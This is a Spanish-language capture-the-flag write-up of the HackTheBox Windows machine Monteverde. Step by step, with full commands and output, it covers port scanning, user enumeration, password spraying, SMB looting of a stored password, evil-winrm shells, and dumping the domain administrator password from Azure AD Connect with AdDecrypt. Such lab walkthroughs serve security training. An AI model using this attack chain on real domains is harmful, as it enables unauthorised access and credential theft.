Monteverde es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad media.
En este caso se trata de una máquina basada en el Sistema Operativo Windows.
Índice
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina Monteverde 10.10.10.172 a /etc/hosts como monteverde.htb y comenzamos con el escaneo de puertos nmap.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 |
# Nmap 7.80 scan initiated Wed May 13 20:58:16 2020 as: nmap -sV -sC -Pn -p- -oA monteverde-nmap 10.10.10.172 Nmap scan report for 10.10.10.172 Host is up (0.058s latency). Not shown: 65518 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-13 17:15:24Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49675/tcp open msrpc Microsoft Windows RPC 49706/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=5/13%Time=5EBBC5B3%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: -46m59s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-05-13T09:17:49 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed May 13 21:07:26 2020 -- 1 IP address (1 host up) scanned in 549.58 seconds |
Obtenemos que existen varios puertos abiertos que pertenecen a diferentes servicios. Continuaremos enumerando el sistema en busca de más información al respecto.
Enumeración
Comenzaremos la enumeración con enum4linux para intentar descubrir información del dominio y los usuarios existentes:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 |
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed May 13 20:59:40 2020 ========================== | Target Information | ========================== Target ........... 10.10.10.172 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ==================================================== | Enumerating Workgroup/Domain on 10.10.10.172 | ==================================================== [E] Can't find workgroup/domain ============================================ | Nbtstat Information for 10.10.10.172 | ============================================ Looking up status of 10.10.10.172 No reply from 10.10.10.172 ===================================== | Session Check on 10.10.10.172 | ===================================== [+] Server 10.10.10.172 allows sessions using username '', password '' [+] Got domain/workgroup name: =========================================== | Getting domain SID for 10.10.10.172 | =========================================== Domain Name: MEGABANK Domain Sid: S-1-5-21-391775091-850290835-3566037492 [+] Host is part of a domain (not a workgroup) ====================================== | OS information on 10.10.10.172 | ====================================== [+] Got OS info for 10.10.10.172 from smbclient: [+] Got OS info for 10.10.10.172 from srvinfo: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED ============================= | Users on 10.10.10.172 | ============================= index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE. index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null) index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null) index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null) index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null) index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null) index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null) index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null) index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null) user:[Guest] rid:[0x1f5] user:[AAD_987d7f2f57d2] rid:[0x450] user:[mhope] rid:[0x641] user:[SABatchJobs] rid:[0xa2a] user:[svc-ata] rid:[0xa2b] user:[svc-bexec] rid:[0xa2c] user:[svc-netapp] rid:[0xa2d] user:[dgalanos] rid:[0xa35] user:[roleary] rid:[0xa36] user:[smorgan] rid:[0xa37] ========================================= | Share Enumeration on 10.10.10.172 | ========================================= Sharename Type Comment --------- ---- ------- SMB1 disabled -- no workgroup available [+] Attempting to map shares on 10.10.10.172 ==================================================== | Password Policy Information for 10.10.10.172 | ==================================================== [+] Attaching to 10.10.10.172 using a NULL share [+] Trying protocol 139/SMB... [!] Protocol failed: Cannot request session (Called Name:10.10.10.172) [+] Trying protocol 445/SMB... [+] Found domain(s): [+] MEGABANK [+] Builtin [+] Password Info for Domain: MEGABANK [+] Minimum password length: 7 [+] Password history length: 24 [+] Maximum password age: 41 days 23 hours 53 minutes [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: 1 day 4 minutes [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: Not Set [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 7 ============================== | Groups on 10.10.10.172 | ============================== [+] Getting builtin groups: group:[Pre-Windows 2000 Compatible Access] rid:[0x22a] group:[Incoming Forest Trust Builders] rid:[0x22d] group:[Windows Authorization Access Group] rid:[0x230] group:[Terminal Server License Servers] rid:[0x231] group:[Users] rid:[0x221] group:[Guests] rid:[0x222] group:[Remote Desktop Users] rid:[0x22b] group:[Network Configuration Operators] rid:[0x22c] group:[Performance Monitor Users] rid:[0x22e] group:[Performance Log Users] rid:[0x22f] group:[Distributed COM Users] rid:[0x232] group:[IIS_IUSRS] rid:[0x238] group:[Cryptographic Operators] rid:[0x239] group:[Event Log Readers] rid:[0x23d] group:[Certificate Service DCOM Access] rid:[0x23e] group:[RDS Remote Access Servers] rid:[0x23f] group:[RDS Endpoint Servers] rid:[0x240] group:[RDS Management Servers] rid:[0x241] group:[Hyper-V Administrators] rid:[0x242] group:[Access Control Assistance Operators] rid:[0x243] group:[Remote Management Users] rid:[0x244] group:[Storage Replica Administrators] rid:[0x246] [+] Getting builtin group memberships: Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs Group 'Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs Group 'Guests' (RID: 546) has member: Couldn't lookup SIDs Group 'Users' (RID: 545) has member: Couldn't lookup SIDs Group 'Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs Group 'IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs [+] Getting local groups: group:[Cert Publishers] rid:[0x205] group:[RAS and IAS Servers] rid:[0x229] group:[Allowed RODC Password Replication Group] rid:[0x23b] group:[Denied RODC Password Replication Group] rid:[0x23c] group:[DnsAdmins] rid:[0x44d] group:[SQLServer2005SQLBrowserUser$MONTEVERDE] rid:[0x44f] group:[ADSyncAdmins] rid:[0x451] group:[ADSyncOperators] rid:[0x452] group:[ADSyncBrowse] rid:[0x453] group:[ADSyncPasswordSet] rid:[0x454] [+] Getting local group memberships: Group 'ADSyncAdmins' (RID: 1105) has member: Couldn't lookup SIDs Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs [+] Getting domain groups: group:[Enterprise Read-only Domain Controllers] rid:[0x1f2] group:[Domain Users] rid:[0x201] group:[Domain Guests] rid:[0x202] group:[Domain Computers] rid:[0x203] group:[Group Policy Creator Owners] rid:[0x208] group:[Cloneable Domain Controllers] rid:[0x20a] group:[Protected Users] rid:[0x20d] group:[DnsUpdateProxy] rid:[0x44e] group:[Azure Admins] rid:[0xa29] group:[File Server Admins] rid:[0xa2e] group:[Call Recording Admins] rid:[0xa2f] group:[Reception] rid:[0xa30] group:[Operations] rid:[0xa31] group:[Trading] rid:[0xa32] group:[HelpDesk] rid:[0xa33] group:[Developers] rid:[0xa34] [+] Getting domain group memberships: Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2 Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2 Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest ======================================================================= | Users on 10.10.10.172 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================= [E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible. ============================================= | Getting printer info for 10.10.10.172 | ============================================= Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED enum4linux complete on Wed May 13 21:01:38 2020 |
Hemos conseguido un listado de usuarios existentes en el sistema, el nombre de dominio, así como algo más de información relevante.
Después de dar varias vueltas al respecto, vamos a crear un diccionario de usuarios y contraseñas con los datos obtenidos hasta el momento y utilizaremos la herramienta CrackMapExec para comprobar si disponemos de la password de alguno de ellos en nuestro diccionario.
Muestro sólo el resultado final debido a su tamaño:
|
1 2 3 |
$ cme smb 10.10.10.172 -U list-users.txt -P passwords.txt SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs |
Y conseguimos que la contraseña del usuario SABatchJobs es el mismo nombre de usuario, por lo que nos ha tocado un administrador de sistemas bastante vago y un caso que se podría dar perfectamente en una máquina real.
Con el acceso obtenido, probamos a entrar en la máquina pero no podemos hacerlo, así que seguimos enumerando.
Puesto que el análisis lo hemos realizado contra smb verificamos si podemos conectarnos al mismo con las credenciales obtenidas:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
$ smbclient -L \\\\10.10.10.172 -U SABatchJobs Enter WORKGROUP\SABatchJobs's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin azure_uploads Disk C$ Disk Default share E$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share users$ Disk SMB1 disabled -- no workgroup available |
Y lo conseguimos así que vamos a explorar el contenido existente a ver si conseguimos más información al respecto u otras credenciales.
Verificamos el acceso a los diferentes directorios y obtenemos el mismo en el directorio users$:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
smbclient \\\\10.10.10.172\\users$ -U SABatchJobs Enter WORKGROUP\SABatchJobs's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri Jan 3 14:12:48 2020 .. D 0 Fri Jan 3 14:12:48 2020 dgalanos D 0 Fri Jan 3 14:12:30 2020 mhope D 0 Fri Jan 3 14:41:18 2020 roleary D 0 Fri Jan 3 14:10:30 2020 smorgan D 0 Fri Jan 3 14:10:24 2020 524031 blocks of size 4096. 519955 blocks available smb: \> |
Analizando el mismo obtenemos un fichero en la home del usuario mhope, así que nos descargamos dicho fichero:
|
1 2 3 4 5 6 7 8 9 |
smb: \mhope\> ls . D 0 Fri Jan 3 14:41:18 2020 .. D 0 Fri Jan 3 14:41:18 2020 azure.xml AR 1212 Fri Jan 3 14:40:23 2020 524031 blocks of size 4096. 519955 blocks available smb: \mhope\> get azure.xml getting file \mhope\azure.xml of size 1212 as azure.xml (2,6 KiloBytes/sec) (average 3,6 KiloBytes/sec) smb: \mhope\> |
Y cuyo contenido es el siguiente:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <Obj RefId="0"> <TN RefId="0"> <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T> <T>System.Object</T> </TN> <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString> <Props> <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT> <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT> <G N="KeyId">00000000-0000-0000-0000-000000000000</G> <S N="Password">4n0therD4y@n0th3r$</S> </Props> </Obj> </Objs> |
En este fichero encontramos unas credenciales que suponemos que pertenecen al usuario mhope, así que probaremos a continuación el acceso a la máquina con dicho usuario.
Obteniendo la flag de user
Con las credenciales obtenidas del usuario mhope, accedemos utilizando la herramienta evil-winrm:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
$ ruby evil-winrm.rb -i 10.10.10.172 -u mhope -p "4n0therD4y@n0th3r$" Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\mhope\Documents> whoami megabank\mhope *Evil-WinRM* PS C:\Users\mhope\Documents> cd ..\desktop *Evil-WinRM* PS C:\Users\mhope\desktop> dir Directory: C:\Users\mhope\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 1/3/2020 5:48 AM 32 user.txt *Evil-WinRM* PS C:\Users\mhope\desktop> |
Y ya tenemos la flag de user.txt en el directorio desktop de la home del usuario mhope.
Escalando privilegios
Ahora vamos a revisar las posibilidades existentes para escalar privilegios.
Miramos los permisos y grupos del usuario mhope:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 |
*Evil-WinRM* PS C:\users\mhope\documents> whoami /all USER INFORMATION ---------------- User Name SID ============== ============================================ megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601 GROUP INFORMATION ----------------- Group Name Type SID Attributes =========================================== ================ ============================================ ============ ====================================== Everyone Well-known group S-1-1-0 Mandatory gr oup, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory gr oup, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory gr oup, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory gr oup, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory gr oup, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory gr oup, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory gr oup, Enabled by default, Enabled group MEGABANK\Azure Admins Group S-1-5-21-391775091-850290835-3566037492-2601 Mandatory gr oup, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory gr oup, Enabled by default, Enabled group Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled USER CLAIMS INFORMATION ----------------------- User claims unknown. Kerberos support for Dynamic Access Control on this device has been disabled. *Evil-WinRM* PS C:\users\mhope\documents> |
Y encontramos algo interesante, el usuario pertenece al grupo MEGABANK\Azure Admins lo que podría darnos algún indicio o posibilidad para la escalada de privilegios.
Seguimos investigando, y observamos que existe el directorio .Azure en la home del usuario donde se almacenan diferentes datos y la cache de tokens de la conexión con Azure.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
*Evil-WinRM* PS C:\users\mhope> ls Directory: C:\users\mhope Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 1/3/2020 5:35 AM .Azure d-r--- 1/3/2020 5:24 AM 3D Objects d-r--- 1/3/2020 5:24 AM Contacts d-r--- 1/3/2020 5:47 AM Desktop d-r--- 5/13/2020 2:09 AM Documents d-r--- 5/12/2020 10:39 PM Downloads d-r--- 1/3/2020 5:24 AM Favorites d-r--- 1/3/2020 5:24 AM Links d-r--- 1/3/2020 5:24 AM Music d-r--- 1/3/2020 5:24 AM Pictures d-r--- 1/3/2020 5:24 AM Saved Games d-r--- 1/3/2020 5:24 AM Searches d-r--- 1/3/2020 5:24 AM Videos *Evil-WinRM* PS C:\users\mhope> |
Con lo descubierto hasta el momento, investigamos en google y encontramos varios post donde explica como escalar privilegios en windows con un usuario que pertenezca a este grupo mencionado entre los que destacamos el post Azure AD Connect Database Exploit (Priv Esc)
En nuestro caso lo revisamos todo a fondo para entender bien la vulnerabilidad pero vamos a ver en este caso los pasos realizados para conseguir su explotación.
Para una mejor comprensión, la vulnerabilidad permite ejecutar un código en .NET o en Powershell en el servidor donde está instalado Azure AD Connect para obtener las credenciales en texto plano de cualquier cuenta de AD configurada para utilizar.
Así que descargaremos el fichero exe desde el repositorio de github ADSyncDecrypt
Y subiremos los ficheros AdDecrypt.exe y mcrypt.dll a la máquina. Para que funcione correctamente, ambos ficheros deben de situarse en la misma carpeta:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
*Evil-WinRM* PS C:\Users\mhope\Documents> upload /home/asdf/github/addecrypt/AdDecrypt.exe c:\users\mhope\documents Info: Uploading /home/asdf/github/addecrypt/AdDecrypt.exe to c:\users\mhope\documents Data: 19796 bytes of 19796 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Users\mhope\Documents> upload /home/asdf/github/addecrypt/mcrypt.dll c:\users\mhope\documents Info: Uploading /home/asdf/github/addecrypt/mcrypt.dll to c:\users\mhope\documents Data: 334248 bytes of 334248 bytes copied Info: Upload successful! |
Completada la subida deberemos acceder a la ruta donde se encuentran los ficheros binarios del programa Microsoft Azure AD Sync:
|
1 2 3 |
*Evil-WinRM* PS C:\Users\mhope\Documents> cd “C:\Program Files\Microsoft Azure AD Sync\Bin” cd “C:\Program Files\Microsoft Azure AD Sync\Bin” *Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> |
Y lanzaremos el ejecutable indicando la ruta completa al mismo, y conseguiremos las claves del usuario administrador, utilizado para la conexión con Azure:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> c:\users\mhope\documents\AdDecrypt.exe -FullSQL ====================== AZURE AD SYNC CREDENTIAL DECRYPTION TOOL Based on original code from: https://github.com/fox-it/adconnectdump ====================== Opening database connection... Executing SQL commands... Closing database connection... Decrypting XML... Parsing XML... Finished! DECRYPTED CREDENTIALS: Username: administrator Password: d0m@in4dminyeah! Domain: MEGABANK.LOCAL |
Obteniendo la flag de root
Con las credenciales de administrator obtenidas, sólo nos queda acceder a la máquina con dicho usuario y conseguir nuestra flag:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
$ ruby evil-winrm.rb -i 10.10.10.172 -u administrator -p "d0m@in4dminyeah!" Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami megabank\administrator *Evil-WinRM* PS C:\Users\Administrator\Documents> cd .. *Evil-WinRM* PS C:\Users\Administrator> cd desktop *Evil-WinRM* PS C:\Users\Administrator\desktop> dir Directory: C:\Users\Administrator\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 1/3/2020 5:48 AM 32 root.txt *Evil-WinRM* PS C:\Users\Administrator\desktop> |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.
Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respecto en el siguiente enlace https://www.hackthebox.eu/home/users/profile/103792
